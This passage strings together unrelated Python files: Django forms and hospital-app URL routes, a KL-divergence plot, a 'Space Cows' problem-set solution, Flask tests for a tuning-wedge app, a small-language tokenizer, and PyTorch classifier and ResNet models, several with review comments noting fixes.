    """ModelForm exposing only the `images` field of the Images model."""
    class Meta :
        model=Images
        fields=('images',)
# Inline formset for editing the Images rows attached to one Items instance.
imageformset=inlineformset_factory(Items,Images,Imageform,widgets={})
import numpy as np
from scipy.special import rel_entr
import matplotlib.pylab as plt

# Compare two binomial samples against a (roughly) uniform reference via KL
# divergence, then plot the three empirical distributions over values 0..12.
N = 1000000
K = 13  # support size: values 0..12
p = np.random.randint(0,13,size=N)
# fixed: without minlength the three histograms can have different lengths
# (np.bincount stops at the largest observed value), which makes rel_entr
# fail with a shape mismatch whenever a sample never hits 12. minlength
# pins all three distributions to exactly K bins.
p = np.bincount(p, minlength=K)
p = p / p.sum()
q = np.random.binomial(12,0.9,size=N)
q = np.bincount(q, minlength=K)
q = q / q.sum()
w = np.random.binomial(12,0.4,size=N)
w = np.bincount(w, minlength=K)
w = w / w.sum()
print(rel_entr(q,p).sum())
print(rel_entr(w,p).sum())
plt.bar(np.arange(13),p,0.333,hatch="///",edgecolor='k')
plt.bar(np.arange(13)+0.333,q,0.333,hatch="---",edgecolor='k')
plt.bar(np.arange(13)+0.666,w,0.333,hatch="\\\\",edgecolor='k')
plt.xlabel("Value")
plt.ylabel("Proportion")
plt.tight_layout(pad=0,h_pad=0,w_pad=0)
plt.savefig("kl_divergence.png", dpi=300)
plt.show()
|
###########################
# 6.00.2x Problem Set 1: Space Cows
from ps1_partition import get_partitions
import time
#================================
# Part A: Transporting Space Cows
#================================
def load_cows(filename):
    """
    Read the contents of the given file. Assumes the file contents contain
    data in the form of comma-separated cow name, weight pairs, and return a
    dictionary containing cow names as keys and corresponding weights as values.
    Parameters:
    filename - the name of the data file as a string
    Returns:
    a dictionary of cow name (string), weight (int) pairs
    """
    cow_dict = dict()
    # fixed: the original opened the file and never closed it; a context
    # manager guarantees the handle is released.
    with open(filename, 'r') as f:
        for line in f:
            line_data = line.split(',')
            cow_dict[line_data[0]] = int(line_data[1])
    return cow_dict
class Cow(object):
    """A cow with a name and a transport cost (weight); value is always 1."""

    def __init__(self, name, cost):
        self.name = name
        self.cost = cost

    def getValue(self):
        return 1

    def getCost(self):
        return self.cost

    def getName(self):
        return self.name

    def __str__(self):
        return "<" + self.name + ", " + str(self.cost) + ">"
def makeCowsList(cows):
    """Convert a {name: weight} dict into a list of Cow objects."""
    return [Cow(name, cows[name]) for name in cows]
def greedy(list, constraint, keyFunction):
    """Greedy selection: take items in descending keyFunction order while the
    running cost stays within *constraint*.

    Returns (total value, list of chosen items).
    """
    best_items = []
    total_cost = 0.0
    total_value = 0.0
    for item in sorted(list, key=keyFunction, reverse=True):
        if total_cost + item.getCost() <= constraint:
            best_items.append(item)
            total_cost = total_cost + item.getCost()
            total_value = total_value + item.getValue()
    return (total_value, best_items)
# Problem 1
def greedy_cow_transport(cows,limit=10):
    """
    Uses a greedy heuristic to determine an allocation of cows that attempts to
    minimize the number of spaceship trips needed to transport all the cows.
    Repeatedly fills one trip with the heaviest cows that still fit, then
    starts a new trip for the remainder.
    Does not mutate the given collection of cows.
    Parameters:
    cows - a list of Cow objects (name, weight)
    limit - weight limit of the spaceship (an int)
    Returns:
    A list of lists, with each inner list containing the names of cows
    transported on a particular trip and the overall list containing all the
    trips
    """
    # fixed: work on a copy — the original called cows.remove() and mutated
    # the caller's list despite the docstring's promise not to.
    remaining = list(cows)
    trips_list = []
    while len(remaining) > 0:
        (value, trip_cows) = greedy(remaining, limit, lambda x: x.getCost())
        if len(trip_cows) == 0:
            # fixed: a cow heavier than *limit* can never be loaded; the
            # original looped forever in that case.
            break
        trip_names = []
        for cow in trip_cows:
            trip_names.append(cow.getName())
            remaining.remove(cow)
        trips_list.append(trip_names)
    print(trips_list)  # fixed: Python 2 print statement -> function call
    return trips_list  # fixed: the docstring promises a return value
# Problem 2
def brute_force_cow_transport(cows,limit=10):
    """
    Finds the allocation of cows that minimizes the number of spaceship trips
    via brute force. The brute force algorithm should follow the following method:
    1. Enumerate all possible ways that the cows can be divided into separate trips
    2. Select the allocation that minimizes the number of trips without making any trip
    that does not obey the weight limitation
    Does not mutate the given collection of cows.
    Parameters:
    cows - a list of Cow objects (name, weight)
    limit - weight limit of the spaceship (an int)
    Returns:
    A list of lists, with each inner list containing the names of cows
    transported on a particular trip and the overall list containing all the
    trips
    """
    # Keep only the partitions where every trip obeys the weight limit.
    valid_partitions = []
    for partition in get_partitions(cows):
        is_valid = True
        for trip in partition:
            trip_weight = 0
            for cow in trip:
                trip_weight += cow.getCost()
            if trip_weight > limit:
                is_valid = False
                break
        if is_valid:
            valid_partitions.append(partition)
    # Out of the valid partitions, pick the one with the fewest trips.
    min_trips = float('inf')  # fixed: replaces the magic 10000000 sentinel
    min_trips_partition = []
    for trips in valid_partitions:
        if len(trips) < min_trips:
            min_trips = len(trips)
            min_trips_partition = trips
    # Represent the solution as lists of cow names.
    named_cows_trips = []
    for trip in min_trips_partition:
        named_cows_trips.append([cow.getName() for cow in trip])
    print(named_cows_trips)  # fixed: Python 2 print statement -> function call
    return named_cows_trips  # fixed: was `pass`; the docstring promises a return
# Problem 3
def compare_cow_transport_algorithms():
    """
    Using the data from ps1_cow_data.txt and the specified weight limit, run your
    greedy_cow_transport and brute_force_cow_transport functions here. Use the
    default weight limits of 10 for both greedy_cow_transport and
    brute_force_cow_transport.
    Print out the number of trips returned by each method, and how long each
    method takes to run in seconds.
    Returns:
    Does not return anything.
    """
    # TODO: Your code here
    # NOTE(review): intentionally unimplemented — problem-set stub.
    pass
"""
Here is some test data for you to see the results of your algorithms with.
Do not submit this along with any of your answers. Uncomment the last two
lines to print the result of your problem.
"""
cowsText = load_cows("ps1_cow_data.txt")
limit=10
cows = makeCowsList(cowsText);
(greedy_cow_transport(cows, limit))
cows = makeCowsList(cowsText);
(brute_force_cow_transport(cows, limit))
|
from django.conf.urls import url
from django.core.urlresolvers import reverse_lazy
from . import views
# URL routes for the hospital-management app.
# NOTE(review): most patterns lack a trailing `$`, so e.g. r'^patient/' also
# matches any longer path beginning with "patient/" — confirm this prefix
# matching is intended (r'^patientss/...' appears to rely on it).
urlpatterns = [
    url(r'^register/', views.register_patient_page, name='register'),
    url(r'^patient/', views.patient_landing, name='patient'),
    url(r'^patients/', views.view_patients, name='view patients'),
    url(r'^patientss/(?P<patient_id>\d+)/$', views.admitPatient, name='admit patients'),
    url(r'^update_self/', views.editownprofile, name='update'),
    # url(r'^update_user/', views.editownpatientprofile, name='update user'),
    url(r'^update_med_info/(?P<patient_id>[0-9]+)/',
        views.EditPatientMediInfo.as_view(success_url=reverse_lazy('view patients')), name='update medical info for'),
    url(r'^view_med_info/(?P<patient_id>[0-9]+)/',
        views.ViewPatientMediInfo.as_view(), name='view medical info for'),
    url(r'^profile/', views.profile, name='profile'),
    url(r'^export/', views.download, name='download'),
    url(r'^email/', views.email, name='email_info'),
    url(r'^landing/', views.landing, name='landing'),
    url(r'^nurse/', views.nurse_landing, name='nurse'),
    url(r'^doctor/', views.doctor_landing, name='doctor'),
    url(r'^hadmin/', views.admin_landing, name='admin'),
    url(r'^new_hospital/', views.NewHospital.as_view(), name='create new hospital'),
    url(r'^login/$', views.user_login, name='login'),
    url(r'^tests/', views.patient_tests, name='tests'), # Not used any more, redirects to testResults
    url(r'^logout/', views.user_logout, name='logout'),
    url(r'^logs/', views.logs, name='logs'),
    url(r'^upload_patient/', views.upload_patient_info, name='upload patient'),
    url(r'^staffregister/', views.registerStaff, name='staffregister'),
    url(r'^adminregister/', views.register_admin_page, name='adminregister'),
    url(r'^doctorregister/', views.register_doctor_page, name='doctorregister'),
    url(r'^nurseregister/', views.register_nurse_page, name='nurseregister'),
    url(r'^swag/', views.swag, name='swag'),
    url(r'^$', views.main, name='main')
]
|
#!/usr/bin/env python
"""
Copyright 2020, Benjamin L. Dowdell
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from app import create_app
from app.main.forms import ContactForm, TuningWedgeForm
class AppTestCase(unittest.TestCase):
    """Integration tests for the tuning-wedge Flask app.

    Covers the index/about/contact/success routes, valid and invalid wedge and
    contact form submissions, the 404/500 error handlers, and the custom
    NotEqualTo / ValidateFrequency form validators.
    """

    def setUp(self):
        # Fresh app and pushed app context per test; two canned wedge forms
        # (identical layer properties, Ricker vs Ormsby wavelet) are reused
        # and mutated by the individual tests.
        self.app = create_app('testing')
        self.app_context = self.app.app_context()
        self.app_context.push()
        self.client = self.app.test_client()
        self.soft_ricker_wedge_form = TuningWedgeForm(
            layer_1_vp=3000, layer_1_dens=2.5, layer_1_impedance=7500,
            layer_2_vp=2700, layer_2_dens=2.3, layer_2_impedance=6210,
            vp_units=0, wv_type=0, frequency='25',
            wv_length=0.200, wv_dt=0.001
        )
        self.soft_ormsby_wedge_form = TuningWedgeForm(
            layer_1_vp=3000, layer_1_dens=2.5, layer_1_impedance=7500,
            layer_2_vp=2700, layer_2_dens=2.3, layer_2_impedance=6210,
            vp_units=0, wv_type=1, frequency='5, 10, 40, 50',
            wv_length=0.200, wv_dt=0.001
        )

    def tearDown(self):
        self.app_context.pop()

    def test_index_page_get(self):
        response = self.client.get('/')
        self.assertEqual(response.status_code, 200)

    def test_index_page_post_ricker(self):
        # Ricker Wavelet
        # A valid post first redirects (302), then renders 200 when followed.
        response = self.client.post('/index', data=self.soft_ricker_wedge_form.data)
        self.assertEqual(response.status_code, 302)
        response = self.client.post('/index', data=self.soft_ricker_wedge_form.data, follow_redirects=True)
        self.assertEqual(response.status_code, 200)
        self.assertTrue(self.soft_ricker_wedge_form.validate())

    def test_index_page_post_ormsby(self):
        # Ormsby Wavelet
        response = self.client.post('/index', data=self.soft_ormsby_wedge_form.data)
        self.assertEqual(response.status_code, 302)
        response = self.client.post('/index', data=self.soft_ormsby_wedge_form.data, follow_redirects=True)
        self.assertEqual(response.status_code, 200)
        self.assertTrue(self.soft_ormsby_wedge_form.validate())

    def test_index_page_post_same_impedance(self):
        # Equal impedances in both layers must be rejected by the form.
        form = self.soft_ricker_wedge_form
        form.layer_2_vp.data = form.layer_1_vp.data
        form.layer_2_dens.data = form.layer_1_dens.data
        form.layer_2_impedance.data = form.layer_1_impedance.data
        response = self.client.post('/index', data=form.data)
        self.assertEqual(response.status_code, 200)  # form should not validate
        self.assertFalse(form.validate())

    def test_index_page_post_bad_velocity(self):
        # layer_1_vp is empty
        form = self.soft_ricker_wedge_form
        form.layer_1_vp.data = ''
        response = self.client.post('/index', data=dict(layer_1_vp=''))
        self.assertEqual(response.status_code, 200)  # form should not validate
        self.assertFalse(form.validate())
        # layer_1_vp is negative
        form.layer_1_vp.data = -3000
        response = self.client.post('/index', data=form.data)
        self.assertEqual(response.status_code, 200)  # form should not validate
        self.assertFalse(form.validate())
        # layer_1_vp is > 20000
        form.layer_1_vp.data = 100000
        response = self.client.post('/index', data=form.data)
        self.assertEqual(response.status_code, 200)  # should not validate
        self.assertFalse(form.validate())
        # layer_1_vp is non-numeric
        form.layer_1_vp.data = 'apple'
        response = self.client.post('/index', data=dict(layer_1_vp='apple'))
        self.assertEqual(response.status_code, 200)
        with self.assertRaises(TypeError):
            form.validate()

    def test_index_page_post_bad_density(self):
        # layer_1_dens is missing
        form = self.soft_ricker_wedge_form
        form.layer_1_dens.data = ''
        response = self.client.post('/index', data=form.data)
        self.assertEqual(response.status_code, 200)  # form should not validate nor follow redirect
        self.assertFalse(form.validate())
        # layer_1_dens below minimum 1.0
        form.layer_1_dens.data = 0.9
        response = self.client.post('/index', data=form.data)
        self.assertEqual(response.status_code, 200)
        self.assertFalse(form.validate())
        # layer_1_dens above maximum 5.0
        form.layer_1_dens.data = 5.1
        response = self.client.post('/index', data=form.data)
        self.assertEqual(response.status_code, 200)
        self.assertFalse(form.validate())
        # layer_1_dens is non-numeric
        form.layer_1_dens.data = 'apple'
        response = self.client.post('/index', data=form.data)
        self.assertEqual(response.status_code, 200)
        with self.assertRaises(TypeError):
            form.validate()

    def test_index_page_post_bad_ricker_num_freqs(self):
        # Ricker wavelet too many frequencies
        form = self.soft_ricker_wedge_form
        form.frequency.data = '30, 20'
        response = self.client.post('/index', data=form.data)
        self.assertEqual(response.status_code, 200)
        self.assertFalse(form.validate())

    def test_index_page_post_bad_ricker_neg_freqs(self):
        # Ricker wavelet f_central < 0:
        form = self.soft_ricker_wedge_form
        form.frequency.data = '-30'
        response = self.client.post('/index', data=form.data)
        self.assertEqual(response.status_code, 200)
        self.assertFalse(form.validate())

    def test_index_page_post_bad_ormsby_bad_sep(self):
        # Ormsby wavelet frequencies not comma separated
        form = self.soft_ormsby_wedge_form
        form.frequency.data = '5 10 15 20'
        response = self.client.post('/index', data=form.data)
        self.assertEqual(response.status_code, 200)
        self.assertFalse(form.validate())

    def test_index_page_post_bad_orsmby_num_freqs(self):
        # Ormsby wavelet number of frequencies != 4
        form = self.soft_ormsby_wedge_form
        form.frequency.data = '5, 10, 20, 30, 40'
        response = self.client.post('/index', data=form.data)
        self.assertEqual(response.status_code, 200)
        self.assertFalse(form.validate())
        form.frequency = '5, 10, 20'
        response = self.client.post('/index', data=form.data)
        self.assertEqual(response.status_code, 200)
        self.assertFalse(form.validate())

    def test_index_page_post_bad_ormsby_neg_freqs(self):
        # Ormsby wavelet with negatives frequencies
        form = self.soft_ormsby_wedge_form
        form.frequency.data = '10, -20, 30, -40'
        response = self.client.post('/index', data=form.data)
        self.assertEqual(response.status_code, 200)
        self.assertFalse(form.validate())

    def test_index_page_post_bad_ormsby_freqs_not_sequential(self):
        # Ormsby wavelet frequencies not sequentially ordered from least to greatest
        form = self.soft_ormsby_wedge_form
        form.frequency.data = '30, 10, 40, 20'
        response = self.client.post('/index', data=form.data)
        self.assertEqual(response.status_code, 200)
        self.assertFalse(form.validate())

    def test_about_page_get(self):
        response = self.client.get('/about')
        self.assertEqual(response.status_code, 200)

    def test_contact_page_get(self):
        response = self.client.get('/contact')
        self.assertEqual(response.status_code, 200)

    def test_contact_page_post(self):
        form = ContactForm(
            name='Test Name',
            email='test@mail.com',
            subject='Hello World',
            body='Is there anybody out there?'
        )
        response = self.client.post('/contact', data=form.data)
        self.assertEqual(response.status_code, 302)  # successful validation should result in redirect
        response = self.client.post('/contact', data=form.data, follow_redirects=True)
        self.assertEqual(response.status_code, 200)
        self.assertTrue(form.validate())

    def test_contact_page_bad_name_field(self):
        form = ContactForm(
            name=None,
            email='test@mail.com',
            subject='Hello World',
            body='This should not validate'
        )
        response = self.client.post('/contact', data=form.data)
        self.assertIsNot(form.validate(), True)  # name is required to validate
        self.assertEqual(response.status_code, 200)

    def test_contact_page_bad_email_field(self):
        form = ContactForm(
            name='Test Name',
            email='test@mail',
            subject='Hello World',
            body='This should not validate'
        )
        response = self.client.post('/contact', data=form.data)
        self.assertIsNot(form.validate(), True)  # email is not valid
        self.assertEqual(response.status_code, 200)

    def test_contact_page_bad_subject_field(self):
        form = ContactForm(
            name='Test Name',
            email='test@mail.com',
            subject=None,
            body='This should not validate'
        )
        response = self.client.post('/contact', data=form.data)
        self.assertIsNot(form.validate(), True)  # subject is required to validate
        self.assertEqual(response.status_code, 200)

    def test_contact_page_bad_body_field(self):
        form = ContactForm(
            name='Test Name',
            email='test@mail.com',
            subject='Hello World',
            body=None
        )
        response = self.client.post('/contact', data=form.data)
        self.assertIsNot(form.validate(), True)  # body is required to validate
        self.assertEqual(response.status_code, 200)
        form = ContactForm(
            name='Test Name',
            email='test@mail.com',
            subject='Hello World',
            body='a'
        )
        response = self.client.post('/contact', data=form.data)
        self.assertIsNot(form.validate(), True)  # body should be too short to validate
        self.assertEqual(response.status_code, 200)

    def test_success_page_get(self):
        response = self.client.get('/success')
        self.assertEqual(response.status_code, 200)

    def test_404_page_not_found_error(self):
        response = self.client.get('/bad-url')
        self.assertEqual(response.status_code, 404)
        self.assertTrue(b'404 error' in response.data)

    def test_500_internal_server_error(self):
        # https://scotch.io/tutorials/build-a-crud-web-app-with-python-and-flask-part-three
        # first example I could find that shows how to actually test that 500 routes correctly
        @self.app.route('/500')
        def internal_server_error():
            from flask import abort
            abort(500)
        response = self.client.get('/500')
        self.assertEqual(response.status_code, 500)
        self.assertTrue(b'500 error' in response.data)

    def test_forms_NotEqualTo_bad_field(self):
        # 'dens1' is not a field on the form; the validator must fail cleanly.
        form = self.soft_ricker_wedge_form
        form.layer_2_dens.data = form.layer_1_dens.data
        from app.main.forms import NotEqualTo
        self.assertFalse(form.layer_2_dens.validate(form=form, extra_validators=[NotEqualTo('dens1')]))

    def test_forms_NotEqualTo_no_message(self):
        form = self.soft_ricker_wedge_form
        form.layer_2_dens.data = form.layer_1_dens.data
        from app.main.forms import NotEqualTo
        self.assertFalse(form.layer_2_dens.validate(
            form=form,
            extra_validators=[NotEqualTo('layer_1_dens')]
        ))

    def test_forms_ValidateFrequency_bad_field(self):
        form = self.soft_ricker_wedge_form
        from app.main.forms import ValidateFrequency
        self.assertFalse(form.frequency.validate(
            form=form,
            extra_validators=[ValidateFrequency('wv')]
        ))

    def test_forms_ValidateFrequency_ormsby_no_message(self):
        # Non-string frequency data triggers an AttributeError inside the validator.
        form = self.soft_ormsby_wedge_form
        form.frequency.data = 10
        from app.main.forms import ValidateFrequency
        with self.assertRaises(AttributeError):
            form.frequency.validate(form=form, extra_validators=[ValidateFrequency('wv_type')])

    def test_forms_ValidateFrequency_ormsby_with_message(self):
        form = self.soft_ormsby_wedge_form
        form.frequency.data = 10
        from app.main.forms import ValidateFrequency
        with self.assertRaises(AttributeError):
            v = ValidateFrequency('wv_type', message='Test')
            v(form, form.frequency)

    def test_forms_ValidateFrequency_ricker_no_message(self):
        form = self.soft_ricker_wedge_form
        form.frequency.data = 10
        from app.main.forms import ValidateFrequency
        with self.assertRaises(AttributeError):
            form.frequency.validate(form=form, extra_validators=[ValidateFrequency('wv_type')])

    def test_forms_ValidateFrequency_ricker_with_message(self):
        form = self.soft_ricker_wedge_form
        form.frequency.data = 10
        from app.main.forms import ValidateFrequency
        with self.assertRaises(AttributeError):
            v = ValidateFrequency('wv_type', message='Test')
            v(form, form.frequency)
|
from typing import Collection
from storm.checks import Checker
from storm.collection import OPERATORS, OPERATOR_PRIORITY_ORDER, PREFIXES
from storm.tokens import *
from storm.utils import Paginator, strip, extend
def tokenize(string: str) -> list[Token]:
    """Tokenize *string* and return the fully post-processed token list."""
    tokenizer = Tokenizer(string)
    return tokenizer.parse()
class Tokenizer(Checker, Paginator):
    """Turns a source string into a flat list of Tokens.

    parse() scans the sequence left-to-right producing raw tokens, then
    final_parse() rewrites the stream in place: prefixes are merged into the
    token that follows, operators are squashed by priority tier, and print
    tokens absorb their argument.
    """

    def __init__(self, sequence: str) -> None:
        self.tokens: list[Token] = []
        super().__init__(sequence)

    def parse(self) -> list[Token]:
        """Tokenize the whole sequence and return the post-processed tokens."""
        while self.not_reached_end:
            token = self.get_token()
            if token:
                # get_token may return one token or a collection of tokens.
                extend(self.tokens, token)
            self.move_to_next_non_empty()
        self.final_parse()
        return self.tokens

    def final_parse(self) -> None:
        # Order matters: prefixes must be attached before operators are
        # squashed, and print fixing assumes a fully squashed stream.
        self.combine_prefix()
        self.squash_operators()
        self.fix_print()

    def combine_prefix(self) -> None:
        """Merge each PrefixType token into the token that follows it."""
        tokens = Paginator(self.tokens)
        while tokens.not_reached_end:
            if tokens.obj.type is PrefixType and tokens.next():
                tokens.obj = PrefixedToken(tokens.pop(), tokens.obj.value)
            tokens.next()
        self.tokens = tokens.sequence

    def squash_operators(self) -> None:
        """Fold operator tokens with their operands, one priority tier at a time."""
        for operators in OPERATOR_PRIORITY_ORDER:
            tokens = Paginator(self.tokens)
            while tokens.not_reached_end:
                if tokens.obj.type is OperatorType and tokens.obj.value in operators and tokens.next():
                    tokens.obj = SquashedOperatorToken(roper := tokens.pop(), tokens.pop().value, loper := tokens.obj)
                    if loper.type in UnOperatable:
                        # Left side cannot be operated on: reinterpret the
                        # operator characters as a prefix chain on the right
                        # operand and reinsert the left token untouched.
                        for val in tokens.obj.value:
                            if val not in PREFIXES:
                                raise SyntaxError(f'Unknown Prefix {val}')
                        tokens.obj = PrefixedToken(roper, tokens.obj.value)
                        tokens.sequence.insert(tokens.index, loper)
                        tokens.next()
                    elif roper.type is UnOperatable:
                        raise SyntaxError(f'No roperand {loper.value}{tokens.obj.value}')
                tokens.next()
            self.tokens = tokens.sequence

    def fix_print(self) -> None:
        """Attach the token following each print token as its value."""
        tokens = Paginator(self.tokens)
        while tokens.not_reached_end:
            if tokens.obj.type is PrintType and tokens.next():
                tokens.obj.value = tokens.pop()
            tokens.next()
        self.tokens = tokens.sequence

    def get_token(self) -> Collection[Token] | Token | None:
        # Dispatch on the current character class; falls through (returning
        # None) for characters no check recognises.
        if self.int_check():
            return self.parse_number()
        elif self.char_check():
            return self.parse_variable()
        elif self.print_check():
            return self.parse_print()
        elif self.base_operator_check():
            return self.parse_operator()
        elif self.prefix_check():
            return self.parse_prefix()
        elif self.string_check():
            return self.parse_string()
        elif self.line_break_check():
            return self.break_line()
        self.goto_next_non_empty()

    def break_line(self) -> Token:
        """Consume a statement separator and emit a LineBreak token."""
        self.goto_next_non_empty()
        return Token(LineBreak, ';')

    def parse_number(self) -> Token:
        """Read an integer or decimal literal (at most one decimal point)."""
        value = ''
        checks = [self.int_check, self.period_check]

        def check_decimal() -> bool:
            # Digits always pass; the period check is removed from the list
            # after its first hit so a second '.' terminates the number.
            for pos, check in enumerate(checks):
                if check():
                    if pos > 0:
                        checks.pop(pos)
                    return True
            return False

        while check_decimal():
            value += self.obj
            self.goto_next_non_empty()
        return Token(NumberType, value)

    def parse_variable(self) -> Token:
        """Read a run of identifier characters as a variable token."""
        value = ''
        while self.char_check():
            value += self.obj
            self.goto_next_non_empty()
        return Token(VariableType, value)

    def parse_operator(self) -> Collection[Token] | Token:
        """Read the longest known operator; trailing characters become a prefix."""
        value = ''
        while self.base_operator_check():
            value += self.obj
            if value not in OPERATORS:
                # Overshot the longest valid operator: back off one char.
                value = value[:-1]
                break
            self.goto_next_non_empty()
        res = [Token(OperatorType, value), self.parse_prefix()]
        return strip(res, '')

    def parse_prefix(self) -> Token | str:
        """Read prefix characters; returns '' (falsy) when none are present."""
        value = ''
        while self.prefix_check():
            value += self.obj
            self.goto_next_non_empty()
        return value and Token(PrefixType, value)

    def parse_string(self) -> Token:
        """Read a quoted string; adjacent string literals are concatenated."""
        value = ''
        starting_paren = self.obj
        while self.not_reached_end:
            self.next()
            value += self.obj
            if self.obj == starting_paren:
                self.goto_next_non_empty()
                if self.string_check():
                    value += self.parse_string().value
                # Drop the closing quote captured in `value`.
                return Token(StringType, value[:-1])
        else:
            # Loop ran off the end without seeing the closing quote.
            raise SyntaxError("Unclosed string")

    def parse_print(self) -> Token:
        """Consume the print keyword; its value is filled in by fix_print()."""
        self.goto_next_non_empty(2)
        return Token(PrintType, None)
|
import torch
import torch.nn.functional as F
from torch import nn
def custom_init_fun(m):
    """Weight initializer intended for ``Module.apply``.

    Conv/ConvTranspose weights ~ N(0, 0.02), BatchNorm weights ~ N(1, 0.02),
    Linear weights ~ N(0, 0.1); every bias that exists is zeroed. Modules of
    other types are left untouched.
    """
    # Idiom: a single isinstance() call with a tuple replaces the chained
    # isinstance-or test of the original.
    if isinstance(m, (nn.ConvTranspose2d, nn.Conv2d)):
        m.weight.data.normal_(0.0, 0.02)
        if m.bias is not None:
            m.bias.data.fill_(0)
    elif isinstance(m, nn.BatchNorm2d):
        m.weight.data.normal_(1.0, 0.02)
        m.bias.data.fill_(0)
    elif isinstance(m, nn.Linear):
        m.weight.data.normal_(0.0, 0.1)
        if m.bias is not None:
            m.bias.data.fill_(0)
class FCNet(nn.Module):
    """Fully connected classifier.

    Flattens the input image, applies ReLU hidden layers of width
    ``layer_size``, then a linear output layer. The layer count matches the
    original layout: 1 input layer + (num_layers - 1) hidden + 1 output.
    """

    def __init__(self, image_size, channels, num_layers, layer_size, classes):
        super().__init__()
        # Sanity-check the architecture hyper-parameters.
        assert image_size > 1
        assert channels >= 1
        assert num_layers > 1
        assert layer_size > 1
        assert classes > 1
        self.image_size = image_size
        self.channels = channels
        self.num_layers = num_layers
        self.layer_size = layer_size
        self.classes = classes
        self.layers = nn.ModuleList()
        # First layer: flattened image -> hidden width.
        self.layers.append(nn.Linear(self.image_size ** 2 * self.channels, self.layer_size))
        # Remaining hidden layers.
        for _ in range(self.num_layers - 1):
            self.layers.append(nn.Linear(self.layer_size, self.layer_size))
        # Output (logit) layer.
        self.layers.append(nn.Linear(self.layer_size, self.classes))

    def forward(self, x):
        """Return raw class logits of shape (batch, classes)."""
        x = x.view(x.size(0), -1)
        for fc_layer in self.layers[:-1]:
            x = torch.relu(fc_layer(x))
        # BUG FIX: the original applied ReLU to the output layer as well,
        # which clamps every logit to be non-negative. Return raw logits.
        return self.layers[-1](x)
class DCNet(nn.Module):
    """Simple convolutional classifier.

    `num_layers` same-padded, stride-1 convolutions (each followed by ReLU and,
    optionally, BatchNorm), then a global max-pool and a linear head.
    """

    def __init__(self, image_size, channels, num_layers, num_filters, kernel_size, classes, batchnorm=True):
        super().__init__()
        assert image_size > 1
        assert channels >= 1
        assert classes > 1
        assert num_layers >= 1
        self.image_size = image_size
        self.channels = channels
        self.num_layers = num_layers
        self.kernel_size = kernel_size
        self.num_filters = num_filters
        self.classes = classes
        self.batchnorm = batchnorm
        self.layers = nn.ModuleList()
        if self.batchnorm:
            self.bn_layers = nn.ModuleList()
        # assume, for simplicity, that we only use 'same' padding and stride 1
        padding = (self.kernel_size - 1) // 2
        c_in = self.channels
        c_out = self.num_filters
        for layer in range(self.num_layers):
            self.layers.append(nn.Conv2d(c_in, c_out, kernel_size=self.kernel_size, stride=1, padding=padding))
            # Channel count stays constant after the first conv.
            c_in, c_out = c_out, c_out
            # c_in, c_out = c_out, c_out + self.filters_inc
            if self.batchnorm:
                self.bn_layers.append(nn.BatchNorm2d(c_out))
        # Head consumes one value per channel (after global max-pool).
        self.layers.append(nn.Linear(c_out, self.classes))

    def forward(self, x):
        for i, layer in enumerate(self.layers[:-1]):
            x = torch.relu(layer(x))
            # NOTE(review): BatchNorm is applied *after* the ReLU here; the
            # conventional ordering is conv -> BN -> ReLU — confirm intended.
            if self.batchnorm:
                x = self.bn_layers[i](x)
        # Global max-pool over the full spatial extent, then flatten.
        x_transformed = nn.functional.max_pool2d(x, (x.size(2), x.size(3))).view(x.size(0), -1)
        last_activations = self.layers[-1](x_transformed)
        return last_activations
class LambdaLayer(nn.Module):
    """Wraps an arbitrary callable so it can be used as an nn.Module."""

    def __init__(self, lambd):
        super(LambdaLayer, self).__init__()
        # Store the callable; forward() simply delegates to it.
        self.lambd = lambd

    def forward(self, x):
        return self.lambd(x)
class BasicBlock(nn.Module):
    """Two-conv residual block (He et al.) for CIFAR-style ResNets.

    When the spatial or channel dimensions change, the shortcut is either a
    zero-padded, strided slice (option A, parameter-free) or a 1x1 conv + BN
    (option B).
    """
    # Output channels = planes * expansion.
    expansion = 1

    def __init__(self, in_planes, planes, stride=1, option='A'):
        super(BasicBlock, self).__init__()
        self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
        self.bn1 = nn.BatchNorm2d(planes)
        self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
        self.bn2 = nn.BatchNorm2d(planes)
        self.shortcut = nn.Sequential()
        if stride != 1 or in_planes != planes:
            if option == 'A':
                """
                For CIFAR10 ResNet paper uses option A.
                """
                # Subsample spatially by 2 and zero-pad the channel dimension.
                self.shortcut = LambdaLayer(lambda x: F.pad(x[:, :, ::2, ::2],
                                                            (0, 0, 0, 0, planes // 4, planes // 4), "constant", 0))
            elif option == 'B':
                self.shortcut = nn.Sequential(
                    nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1, stride=stride, bias=False),
                    nn.BatchNorm2d(self.expansion * planes))

    def forward(self, x):
        out = torch.relu(self.bn1(self.conv1(x)))
        out = self.bn2(self.conv2(out))
        # Residual connection before the final activation.
        out += self.shortcut(x)
        out = torch.relu(out)
        return out
class Bottleneck(nn.Module):
    """1x1 -> 3x3 -> 1x1 bottleneck residual block; output width is 4x planes."""
    # Output channels = planes * expansion.
    expansion = 4

    def __init__(self, in_planes, planes, stride=1):
        super(Bottleneck, self).__init__()
        self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
        self.bn1 = nn.BatchNorm2d(planes)
        self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
        self.bn2 = nn.BatchNorm2d(planes)
        self.conv3 = nn.Conv2d(planes, self.expansion * planes, kernel_size=1, bias=False)
        self.bn3 = nn.BatchNorm2d(self.expansion * planes)
        self.shortcut = nn.Sequential()
        # Projection shortcut whenever shape changes.
        if stride != 1 or in_planes != self.expansion * planes:
            self.shortcut = nn.Sequential(
                nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(self.expansion * planes))

    def forward(self, x):
        out = F.relu(self.bn1(self.conv1(x)))
        out = F.relu(self.bn2(self.conv2(out)))
        out = self.bn3(self.conv3(out))
        out += self.shortcut(x)
        out = F.relu(out)
        return out
class ResNet(nn.Module):
    """CIFAR-style ResNet: 3x3 stem, three residual stages of base widths
    16/32/64 (scaled by ``block.expansion``), global average pooling, linear
    classifier.

    ``num_blocks`` gives the per-stage block count; exactly three entries are
    consumed.
    """

